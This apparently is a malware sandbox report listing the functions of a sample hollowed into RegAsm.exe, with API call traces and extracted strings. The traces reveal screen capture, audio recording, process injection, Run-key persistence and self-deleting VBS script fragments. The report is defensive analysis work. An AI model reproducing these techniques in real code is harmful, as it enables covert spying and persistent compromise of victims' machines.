              Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
              • HeapFree.KERNEL32(00000000), ref: 004120EE
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
              • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
              • Opcode Fuzzy Hash: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
              • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
              Function 00434C52 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
              Download Yara Rule
              APIs
              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: FeaturePresentProcessor
              • String ID:
              • API String ID: 2325560087-0
              • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
              • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
              • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
              • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
              Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$_free$InfoLocale_abort
              • String ID:
              • API String ID: 1663032902-0
              • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
              • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
              • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
              • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
              Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$InfoLocale_abort_free
              • String ID:
              • API String ID: 2692324296-0
              • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
              • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
              • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
              • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
              Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
              • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CriticalEnterEnumLocalesSectionSystem
              • String ID:
              • API String ID: 1272433827-0
              • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
              • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
              • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
              • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
              Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem_abort_free
              • String ID:
              • API String ID: 1084509184-0
              • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
              • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
              • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
              • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
              Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
              Download Yara Rule
              APIs
              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: InfoLocale
              • String ID:
              • API String ID: 2299586839-0
              • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
              • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
              • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
              • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
              Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
              Download Yara Rule
              APIs
              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
              • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
              • DeleteDC.GDI32(00000000), ref: 00418F2A
              • DeleteDC.GDI32(00000000), ref: 00418F2D
              • DeleteObject.GDI32(00000000), ref: 00418F30
              • SelectObject.GDI32(00000000,00000000), ref: 00418F51
              • DeleteDC.GDI32(00000000), ref: 00418F62
              • DeleteDC.GDI32(00000000), ref: 00418F65
              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
              • GetIconInfo.USER32 ref: 00418FBD
              • DeleteObject.GDI32(?), ref: 00418FEC
              • DeleteObject.GDI32(?), ref: 00418FF9
              • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
              • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
              • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
              • DeleteDC.GDI32(?), ref: 0041917C
              • DeleteDC.GDI32(00000000), ref: 0041917F
              • DeleteObject.GDI32(00000000), ref: 00419182
              • GlobalFree.KERNEL32(?), ref: 0041918D
              • DeleteObject.GDI32(00000000), ref: 00419241
              • GlobalFree.KERNEL32(?), ref: 00419248
              • DeleteDC.GDI32(?), ref: 00419258
              • DeleteDC.GDI32(00000000), ref: 00419263
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
              • String ID: DISPLAY
              • API String ID: 479521175-865373369
              • Opcode ID: fd3515ee385558d8e943bffbf3e4feffdcfed35a1f0292415d45ed89f267a670
              • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
              • Opcode Fuzzy Hash: fd3515ee385558d8e943bffbf3e4feffdcfed35a1f0292415d45ed89f267a670
              • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
              Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
              Download Yara Rule
              APIs
              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
              • GetProcAddress.KERNEL32(00000000), ref: 00418139
              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
              • GetProcAddress.KERNEL32(00000000), ref: 0041814D
              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
              • GetProcAddress.KERNEL32(00000000), ref: 00418161
              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
              • GetProcAddress.KERNEL32(00000000), ref: 00418175
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
              • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
              • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
              • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
              • ResumeThread.KERNEL32(?), ref: 00418435
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
              • GetCurrentProcess.KERNEL32(?), ref: 00418457
              • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
              • GetLastError.KERNEL32 ref: 0041847A
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
              • API String ID: 4188446516-3035715614
              • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
              • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
              • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
              • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
              Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
              • ExitProcess.KERNEL32 ref: 0040D7D0
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
              • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
              • API String ID: 1861856835-332907002
              • Opcode ID: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
              • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
              • Opcode Fuzzy Hash: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
              • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
              Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65941986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
              • ExitProcess.KERNEL32 ref: 0040D419
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
              • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
              • API String ID: 3797177996-2557013105
              • Opcode ID: f90a1b7fb6ddb8bcfd4c781e5951c9b58c69a0543b10567a2cebf66b5454372d
              • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
              • Opcode Fuzzy Hash: f90a1b7fb6ddb8bcfd4c781e5951c9b58c69a0543b10567a2cebf66b5454372d
              • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
              Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
              Download Yara Rule
              APIs
              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
              • ExitProcess.KERNEL32(00000000), ref: 004124A0
              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
              • CloseHandle.KERNEL32(00000000), ref: 0041253B
              • GetCurrentProcessId.KERNEL32 ref: 00412541
              • PathFileExistsW.SHLWAPI(?), ref: 00412572
              • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
              • lstrcatW.KERNEL32 ref: 00412601
                • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
              • Sleep.KERNEL32(000001F4), ref: 00412682
              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
              • CloseHandle.KERNEL32(00000000), ref: 004126A9
              • GetCurrentProcessId.KERNEL32 ref: 004126AF
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
              • String ID: .exe$8SG$WDH$exepath$open$temp_
              • API String ID: 2649220323-436679193
              • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
              • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
              • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
              • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
              Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
              Download Yara Rule
              APIs
              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
              • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
              • SetEvent.KERNEL32 ref: 0041B219
              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
              • CloseHandle.KERNEL32 ref: 0041B23A
              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
              • API String ID: 738084811-2094122233
              • Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
              • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
              • Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
              • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
              Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
              • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
              • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
              • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$Write$Create
              • String ID: RIFF$WAVE$data$fmt
              • API String ID: 1602526932-4212202414
              • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
              • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
              • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
              • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
              Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
              • GetProcAddress.KERNEL32(00000000), ref: 0040728D
              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
              • GetProcAddress.KERNEL32(00000000), ref: 004072A5
              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
              • GetProcAddress.KERNEL32(00000000), ref: 004072B9
              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
              • GetProcAddress.KERNEL32(00000000), ref: 004072CD
              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
              • GetProcAddress.KERNEL32(00000000), ref: 004072E1
              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
              • GetProcAddress.KERNEL32(00000000), ref: 004072F5
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressHandleModuleProc
              • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
              • API String ID: 1646373207-351152038
              • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
              • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
              • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
              • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
              Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
              Download Yara Rule
              APIs
              • _wcslen.LIBCMT ref: 0040CE07
              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
              • CopyFileW.KERNEL32 ref: 0040CED0
              • _wcslen.LIBCMT ref: 0040CEE6
              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
              • CopyFileW.KERNEL32 ref: 0040CF84
